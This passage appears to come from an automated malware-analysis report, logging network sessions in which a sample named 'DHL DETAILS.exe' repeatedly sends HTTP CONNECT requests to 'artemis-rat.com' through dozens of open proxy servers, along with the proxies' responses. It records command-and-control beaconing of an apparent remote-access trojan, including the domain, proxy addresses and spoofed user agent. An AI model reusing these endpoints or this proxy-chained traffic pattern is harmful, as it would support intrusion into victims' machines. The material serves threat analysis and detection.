Mar 9, 2024 13:14:15.381058931 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 c7 29 03 a6 b0 c1 95 f9 5a 06 cc 2e 51 1f 0b 4e 4f ce d1 c6 54 cf a7 7b 9f af e1 d9 7d 8c 3b 56 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 bf 5e 56 b8 ce 33 50 2b d0 74 01 0b 3a 1a b6 da 80 2b 5f 68 2b Data Ascii: %! )Z.QNOT{};V(^V3P+t:+_h+JS3)
Mar 9, 2024 13:14:15.644895077 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 78 27 50 7f 38 a5 17 a4 9d 31 f6 5d c2 62 be 0e 83 2f f3 68 66 8e ba ed 38 c7 d2 fb a5 ad 52 5b de 6f 0e 48 40 e6 58 92 Data Ascii: (x'P81]b/hf8R[oH@X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
628	192.168.2.5	51828	147.47.224.168	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.811726093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
629	192.168.2.5	51815	51.15.223.24	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.811738014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.473865032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.381050110 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.102435112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.591310024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
630	192.168.2.5	51733	103.190.54.141	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.811877012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
631	192.168.2.5	51772	212.108.155.205	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.811877966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
632	192.168.2.5	51961	159.65.77.168	8585	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.816447020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
633	192.168.2.5	51851	211.222.252.187	8193	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.819433928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
634	192.168.2.5	51392	177.234.244.174	32213	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.823786974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
635	192.168.2.5	51864	211.222.252.187	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.824100018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
636	192.168.2.5	51760	115.96.208.124	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.825980902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.231586933 CET	72	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
637	192.168.2.5	52006	104.21.102.95	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.837526083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.991897106 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
638	192.168.2.5	51941	98.162.25.7	31653	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.885898113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
639	192.168.2.5	51876	104.248.151.220	59755	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.885898113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.677109957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781323910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.871243000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
640	192.168.2.5	51861	8.219.228.100	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.885904074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
641	192.168.2.5	52022	104.21.6.88	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.886044979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.041047096 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
642	192.168.2.5	51899	45.120.178.197	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.886045933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
643	192.168.2.5	51738	124.163.236.54	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.886401892 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:15.801806927 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:16.290132046 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
644	192.168.2.5	51910	84.39.112.144	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.887784958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
645	192.168.2.5	51653	36.134.91.82	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.888423920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
646	192.168.2.5	51890	121.128.194.154	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.890029907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
647	192.168.2.5	51434	51.79.87.144	54395	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.898098946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.442516088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.333348989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724428892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
648	192.168.2.5	51914	150.109.243.156	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.902767897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
649	192.168.2.5	52040	104.16.213.202	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.905591965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.059746027 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
650	192.168.2.5	52041	172.67.181.51	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.906045914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.060133934 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
651	192.168.2.5	51932	8.218.231.62	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.906829119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
652	192.168.2.5	51979	184.178.172.5	15303	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.914489985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
653	192.168.2.5	51980	98.170.57.249	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.917880058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
654	192.168.2.5	51984	72.210.252.137	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.922714949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
655	192.168.2.5	51916	210.4.194.196	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.923007965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
656	192.168.2.5	49730	45.65.138.48	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.927850962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.939634085 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
657	192.168.2.5	51940	103.23.100.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.939542055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.677069902 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.781372070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
658	192.168.2.5	51947	211.222.252.187	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.943850994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.249495983 CET	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
659	192.168.2.5	52112	104.16.109.207	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.979254007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.134047985 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
660	192.168.2.5	51900	34.93.157.87	21802	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:14.979500055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.829070091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
661	192.168.2.5	51888	103.153.154.6	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
